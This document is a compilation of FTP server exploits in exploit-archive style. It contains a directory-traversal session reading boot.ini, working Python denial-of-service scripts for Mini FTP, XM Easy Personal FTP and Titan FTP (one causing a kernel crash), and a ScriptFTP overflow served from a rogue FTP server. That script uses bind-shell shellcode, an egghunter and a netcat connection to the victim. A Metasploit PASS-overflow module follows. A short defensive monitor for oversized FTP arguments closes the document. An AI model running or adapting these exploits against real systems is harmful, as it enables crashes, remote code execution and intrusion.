11-14-09  11:56PM       <DIR>          Documents and Settings
11-14-09  11:49PM                    0 IO.SYS
11-14-09  11:49PM                    0 MSDOS.SYS
04-15-08  01:00PM                47564 NTDETECT.COM
04-15-08  01:00PM               251152 ntldr
11-07-10  05:45PM           1610612736 pagefile.sys
11-07-10  04:47PM       <DIR>          Program Files
11-15-09  12:16AM       <DIR>          RECYCLER
11-14-09  11:53PM       <DIR>          System Volume Information
11-07-10  06:29PM       <DIR>          WINDOWS
226 Transfer complete.


220-InterVations FileCOPA FTP Server Version 6.01 2nd November 2010
220 Trial Version. 30 days remaining
user anonymous
331 Password required for anonymous
pass asd
230 User anonymous logged in.
pasv
227 Entering Passive Mode (0,0,0,0,15,160)
cwd ..\..\
250 CWD command successful.
retr boot.ini
150 Opening ASCII mode data connection for boot.ini (211 bytes)
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
226 Transfer complete.



LiquidWorm/Mini FTP Server 1.1 Denial Of Service ( na)

#!/usr/bin/python
#
#
# Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit
#
#
# Vendor: webmaster442
# Product web page: http://miniftpserver.codeplex.com
# Affected version: 1.1.1.0
#
# Summary: Minimal FTP server for windows. Uses only managed code. Works
# with Total commander.
#
# Desc: MiniFTPServer suffers from a denial of service vulnerability
# when passing large number of bytes after authentication, resulting
# in a crash. No need for a valid FTP command to exploit this issue.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# -----------------------------------------------------------------
#
# (1540.918): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
# eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# 031187d3 3909            cmp     dword ptr [ecx],ecx  ds:0023:00000000=????????
# 0:011> d edx
# 00f163e8  80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00  .j.z(.......d...
# 00f163f8  54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80  Tr..............
# 00f16408  00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00  ....Ld..........
# 00f16418  18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
# 00f16428  b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00  ................
# 00f16438  00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00  ............P...
# 00f16448  00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00  ....h..y....pd..
# 00f16458  00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00  .............r..
# 0:011> d
# 00f16468  00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00  ..........\{....
# 00f16478  80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79  .....d......`..y
# 00f16488  c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79  ...............y
# 00f16498  f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00  ....A.A.A.A.A.A.
# 00f164a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
# 00f164d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
#
# -----------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2011-5040
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php
#
#
# 28.08.2011
#

import socket, sys

if len(sys.argv) < 2:
  print ("\n===============================================")
  print ("\nMini FTP Server 1.1 Remote DoS Exploit\n")
  print ("Zero Science Lab - http://www.zeroscience.mk")
  print ("\nID: ZSL-2011-5040")
  print ("\n===============================================")
  print ("\n - Usage: "+ sys.argv[0] +" [hostname]\n")
  sys.exit(0)

host = (sys.argv[1])
data = ("A@" * 50000) #Any char and combination would do
cmd = ('ALLO') #Any CMD would do, or no CMD at all

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[+] Attacking: " + host +"\r\n")
print ("[*] Please be patient...\r\n")

try:
  s.connect((host, 21))
  r=s.recv(1024)
  print (r)
  s.send("USER username\r\n")
  r=s.recv(1024)
  print (r)
  s.send("PASS password\r\n")
  r=s.recv(1024)
  print (r)
  s.send(cmd + " " + data + '\r\n')
  r=s.recv(1024)
  print (r)
  print ("[*] Please be patient...\r\n")
  for x in range(0,10): s.send(cmd + " " + data + '\r\n')
  r=s.recv(1024)
  print (r)
  s.close()

  # a closed socket cannot be reconnected, so probe the host with a fresh one
  try:
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2.connect((host, 21))
    s2.close()
  except socket.error:
    print ("\r\n[*] Host is down!")

except socket.error:
  print ("[*] Oops!")


Mini FTP Server version 1.1 buffer corruption remote denial of service exploit.

modpr0be/ScriptFTP 3.3 Buffer Overflow ( na)

# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)
# Date: September 20, 2011
# Author: modpr0be
# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe
# Version: 3.3
# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)
# CVE : -
#
# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner
#
# You should create your own script to work with ScriptFTP
# for example; enable passive and get the remote directory
# on your evil ftp server.
#
# my example script:
# OPENHOST("8.8.8.8","ftp","ftp")
# SETPASSIVE(ENABLED)
# GETLIST($list,REMOTE_FILES)
# CLOSEHOST
# save it to a file with .ftp extension (eg: exploit.ftp)

# root@bt :/# python scriptftp-bof-poc.py
# [*] ScriptFTP 3.3 Remote Buffer Overflow POC
# [*] by modpr0be[at]digital-echidna[dot]org.
# [*] thanks a lot to cyb3r.anbu | otoy :)
# =============================================
# [*] Evil FTP Server Ready
# [*] Server initiated.
# [*] Awaiting connection...
# [*] Connection created by 172.16.87.129.
# [*] Establishing session.
# [*] Pwning in progress..
# [*] This may take up 50 seconds or less.
# [!] Hunter is hunting the Egg ;)
# [!] Waiting for a shell..
# [!] 0wn3d..!
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\ScriptFTP>
#
# Yes, this poc is using PASSIVE connection and it will
# take some time to establish. I love the way we wait for a shell ;)

#!/usr/bin/python

import socket
import os
import sys
import time

class ftp_server:
    def __init__(self):
        self.host = '0.0.0.0'
        self.passive_port = 7214
        self.log("""
[*] ScriptFTP <=3.3 Remote Buffer Overflow POC
[*] by modpr0be[at]digital-echidna[dot]org
[*] thanks a lot to cyb3r.anbu | otoy :)
=============================================
[*] Evil FTP Server Ready""")

        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(('', 21))
        self.sock.listen(1)

        a = self.passive_port/256
        b = self.passive_port%256
        self.tuple_port = (a, b)
        self.host_join = ','.join(self.host.split('.'))
        self.passive = False

        self.log("[*] Server initiated.")

    def log(self, msg):
        print msg

    def get(self):
        return self.conn.recv(1024).replace('\r', '').replace('\n', '')

    def getcwd(self):
        return os.getcwd().split(chr(92))[-1]

    def put(self, ftr):
        x = {

            150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port),
            200:" Type okay.",
            220:" %s Server is ready."%self.host,
            226:" Listing completed.",
            227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),
            230:" User logged in, proceed.",
            250:' "/%s" is new cwd.'%self.getcwd(),
            257:' "/%s" is cwd.'%self.getcwd(),
            331:" User name okay, need password.",
            502:" Command not implemented.",
            551:" Requested action aborted. Page type unknown."     

                   }[ftr]

        s = '%s%s\r\n'%(ftr, x)
        self.conn.send(s)
        return s

    def main(self):
        self.log("[*] Awaiting connection...")
        self.conn, addr = self.sock.accept()
        self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0])
        self.put(220)
        self.log("[*] Pwning in progress..")
        self.log("[*] This may take up 50 seconds or less.")

        while 1:
            try:
                data = self.get().upper()
            except socket.error:
                self.conn.close()
                self.sock.shutdown(socket.SHUT_RDWR)
                raise socket.error

            if data[:4] == 'USER':   s = 331
            elif data[:4] == 'PASS': s = 230
            elif data[:3] == 'PWD':  s = 257
            elif data[:4] == 'TYPE': s = 200
            elif data[:4] == 'PASV':
                # create passive port
                self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock2.bind(('', self.passive_port))
                self.sock2.listen(1)
                s = self.put(227)
                self.conn2, addr = self.sock2.accept()
                self.passive = True
                s = 0 # don't routine

            elif data[:3] == 'CWD':
                try:
                    os.chdir('..%s'%data.split(' ')[-1])
                    s = 250
                except OSError:
                    s = 551

            elif data[:4] == 'LIST':
                s = self.put(150)
                s = self.passive_do(1)
                s = 0 # don't routine
                print "[!] Hunter is hunting the Egg ;)"
                time.sleep(50)
                print "[!] Waiting for a shell.."
                time.sleep(2)
                print "[!] 0wn3d..!\n"
                os.system("nc %s 4444"%addr[0])
                sys.exit()
            else:
                s = 502

            if s:
                s = self.put(s)

    def passive_do(self, id):
        if id == 1:
            #bind to port 4444
            bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ"
                    "APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
                    "IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI"
                    "XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO"
                    "8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J"
                    "P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1"
                    "8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL"
                    "MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4"
                    "KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2"
                    "1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3"
                    "80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX"
                    "U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM"
                    "2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP"
                    "8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK"
                    "OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO"
                    "TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P"
                    "SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9"
                    "E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW"
                    "KQ7MCT2BO2JKPQCKOZ5A")

            # 32bit egghunter from corelanc0d3r, thx ;)
            egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
             "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
             "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
             "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
             "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
             "SEYWKOYWA")

            junk = "A" * 1746       #junk
            nseh = "\x61\x62"       #nseh
            seh = "\x45\x5B"        #seh ppr somewhere on scriptftp dir

            #prepare for align
            align = "\x60"          #pushad
            align += "\x73"         #nop/align
            align += "\x53"         #push ebx
            align += "\x73"         #nop/align
            align += "\x58"         #pop eax
            align += "\x73"         #nop/align
            align += "\x05\x02\x11"         #add eax,0x11000200
            align += "\x73"                 #nop/align
            align += "\x2d\x01\x11"         #sub eax,0x11000120
            align += "\x73"                 #nop/align

            #walking
            walk = "\x50"           #push eax
            walk += "\x73"          #nop/align
            walk += "\xc3"          #ret

            #align again
            align2 = "0t0t" + "\x73\x57\x73\x58\x73"        #nop/push edi/nop/pop eax/nop
            align2 += "\xb9\x1b\xaa"            #mov ecx,0xaa001b00
            align2 += "\xe8\x73"            #add al,ch + nop
            align2 += "\x50\x73\xc3"            #push eax,nop,ret

            sampah1 = "\x44" * 106 + "\x73"     #eax+106/align nop
            sampah2 = "\x42" * 544          #right after shellcode

            crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1

            res = """-rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+crash+""".txt\r\ndrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 A\r\nrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+ crash +".txt\r\n"

            self.conn2.send(res)
            # self.conn2.send('\r\n') # send blank
        return res

try:
    ftp_server().main()
except socket.error:
    print "[!] Socket is not ready, shutting down...\n"



ScriptFTP versions 3.3 and below suffer from a buffer overflow vulnerability.

Platen/XM Easy Personal FTP 5.8 DoS ( windows)

#!/usr/bin/python
print "\n###############################################################"
print "##                  Iranian Pentesters Home                  ##"
print "##                     Www.Pentesters.Ir                     ##"
print "##                    PLATEN -[ H.jafari ]-                  ##"
print "## XM Easy Personal FTP Server 5.8 Remote Denial Of Service  ##"
print "## http://www.dxm2008.com/data/ftpserversetup.exe            ##"
print "## author: PLATEN                                            ##"
print "## E-mail && blog:                                           ##"
print "## hjafari.blogspot.com                                      ##"
print "## platen.secure[at]gmail[dot]com                            ##"
print "## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder                   ##"
print "## and all members in Pentesters.ir                          ##"
print "############################################################### \n"
import socket
import sys

def Usage():
    print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
def start(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Send evil string"
    sock.send("nlst %s\r\n" %buffer)
    sock.close()

if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    start(hostname,username,passwd)
    sys.exit(0)


Houssam Sahli/Titan FTP Server 8.40 Denial Of Service ( na)

#!/usr/bin/python
#
# Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash
# Date: 25/11/2011
# Author: Houssam Sahli
# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe
# Version: 8.40
# Developed by : South River Technologies, Inc.
# Tested on: Windows XP SP3 French
# Description : This exploit crashes the kernel of a Windows host running Titan FTP Server 8.40, producing the familiar "blue screen of death".
# Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it.


print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n"

import socket
import sys

def Usage():
    print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 2000
def start(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] wait for the crash...;)"
    sock.send("APPE %s\r\n" %buffer)
    sock.close()

if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    start(hostname,username,passwd)
    sys.exit(0)


Titan FTP Server version 8.40 suffers from a denial of service condition that leads to a kernel crash.

metasploit/Easy File Sharing FTP Server 2.0 PASS Overflow ( windows)

##
# $Id: easyfilesharing_pass.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Easy File Sharing FTP Server 2.0 PASS Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the Easy File Sharing 2.0
				service. By sending an overly long password, an attacker can execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-3952' ],
					[ 'OSVDB', '27646' ],
					[ 'BID', '19243' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
				],
			'DisclosureDate' => 'Jul 31 2006',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /Easy File Sharing FTP Server/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		filler =  rand_text_english(2559) + "\xeb\x12"
		filler << make_nops(2) + [target.ret].pack('V')

		sploit = "\x2c" + filler + payload.encoded

		print_status("Trying target #{target.name}...")

		# needs anonymous to be set.
		send_cmd(['USER', "anonymous"], true)
		send_cmd(['PASS', sploit], false)

		handler
		disconnect
	end

end
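The three server-side entries above (XM Easy Personal FTP, Titan FTP and Easy File Sharing FTP) all hinge on the same thing: one control-channel command, NLST, APPE or PASS, carrying an argument thousands of bytes long. The monitor below is an added example, not code from any of the listed exploits or products; its per-verb length limits and the sample session are constructed for illustration, and it flags any command whose argument is oversized or contains non-printable bytes.

```python
import re

# Constructed thresholds for the argument length of each FTP verb; the three
# server-side entries above send roughly 18900 (NLST), 6000 (APPE) and 2600
# (PASS) bytes, while a legitimate path or password is far shorter.
MAX_ARG_LEN = {"USER": 128, "PASS": 128, "CWD": 512, "NLST": 512, "APPE": 512}
DEFAULT_MAX_ARG_LEN = 1024

# An FTP control line is a 3- or 4-letter verb, optional whitespace and argument.
FTP_LINE = re.compile(r"^([A-Za-z]{3,4})(?:\s+(.*))?$")


def check_command(line):
    """Return (verb, arg_len, reason); reason is None when the line looks benign."""
    line = line.rstrip("\r\n")
    m = FTP_LINE.match(line)
    if not m:
        return None, len(line), "unparseable control line"
    verb, arg = m.group(1).upper(), m.group(2) or ""
    limit = MAX_ARG_LEN.get(verb, DEFAULT_MAX_ARG_LEN)
    if len(arg) > limit:
        return verb, len(arg), "argument of %d bytes exceeds %d" % (len(arg), limit)
    if any(not 0x20 <= ord(c) <= 0x7e for c in arg):
        return verb, len(arg), "non-printable bytes in argument"
    return verb, len(arg), None


def scan(lines):
    """Run check_command over a sequence of control lines; return the alerts."""
    alerts = []
    for n, line in enumerate(lines, 1):
        verb, arg_len, reason = check_command(line)
        if reason is not None:
            alerts.append((n, verb, arg_len, reason))
    return alerts


# Constructed sample session: a normal login, then arguments shaped like the
# three listings above (oversized NLST, APPE and PASS arguments).
SAMPLE_SESSION = [
    "USER anonymous\r\n",
    "PASS guest@example.org\r\n",
    "CWD pub\r\n",
    "NLST " + "./A" * 6300 + "\r\n",
    "APPE " + "./A" * 2000 + "\r\n",
    "PASS " + "A" * 2600 + "\r\n",
]

if __name__ == "__main__":
    for n, verb, arg_len, reason in scan(SAMPLE_SESSION):
        print("line %d %s: %s" % (n, verb, reason))
```

The same check can be fed from a packet capture or a server's command log; the point of an argument-length ceiling is that it catches this whole class of overflows without a signature per product.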